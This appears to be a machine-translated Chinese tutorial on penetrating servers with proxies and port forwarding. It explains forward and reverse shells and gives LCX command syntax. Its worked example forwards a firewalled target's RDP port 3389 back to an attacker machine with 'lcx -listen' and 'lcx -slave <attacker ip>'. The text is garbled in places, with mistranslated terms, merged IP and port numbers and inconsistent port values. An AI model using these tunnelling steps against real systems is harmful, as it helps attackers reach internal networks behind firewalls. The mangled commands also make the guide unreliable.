使用代理以及端口转发对服务器进行渗透


      Http代理和Socks代理。Http代理使用Http协议,工作在应用层,主要用于代理浏览器访问网页。Socks代理使用Socks协议,工作在会话层,主要用于传输数据包。Socks代理分为Socks4和Socks5,Socks4只支持TCP,而Socks5支持TCP和UDP。正向代理和反向代理。以下小节将经常提到正向壳、反向壳、正向代理和反向代理。其实只需要理解正向和反向的含义。正向是指从攻击者的计算机主动访问目标机器。例如,通过主动访问目标来构建外壳就是一个前向外壳。反向是从目标机器主动连接攻击者的计算机。例如,通过在目标机器上执行操作来访问攻击者的计算机而创建的外壳是反向外壳。


端口转发。如果被攻击的边界服务器可以接入外部网络,可以考虑使用端口转发穿透内部网络。LCX是最经典的端口转发工具,比如FRP、NPS、EW,也可以用于端口转发。这些工具将在代理工具部分详细描述,LCX将在这里得到强调。使用LCX端口转发。LCX是一个端口转发工具,分为Windows版和Linux版。Linux版本是PortMap。LCX有两个功能:端口映射和端口转发。例如,当目标端口3389仅对内部开放而不对外部开放时,端口映射可用于将端口3389映射到目标的其他端口。当目标位于内部网或目标配置的策略仅允许访问固定端口时,可以通过端口转发来突破限制。


我们以Windows的LCX为例,介绍一下它的用法。常见用法如下:端口转发:lcx-侦听<端口侦听所属请求><要连接的端口>。Lcx-slave<攻击者ip><监听端口><目标ip><目标端口>。端口映射:Lcx-tran<端口等待连接><目标ip><目标端口>。


下面描述一个LCX端口转发的例子,如果攻击者不能通过3389端口远程连接服务器。我们举个例子,看看如何突破这个限制,与内存机连接。因为防火墙只允许访问Web,如果你想监听端口1111转发到端口2222,主管可以先在攻击机上运行命令“lcx-listen1111”。在无人机上运行命令“lcx-slave1.1.11111127.0.0.13389”,将攻击机的端口3389转发给。监听端口。因为攻击机的3389端口转发到1111端口,111端口转发到222端口使用,所以在。攻击机可以连接本地端口2222,即目标机可以连接端口3389进行远程桌面连接。

分享: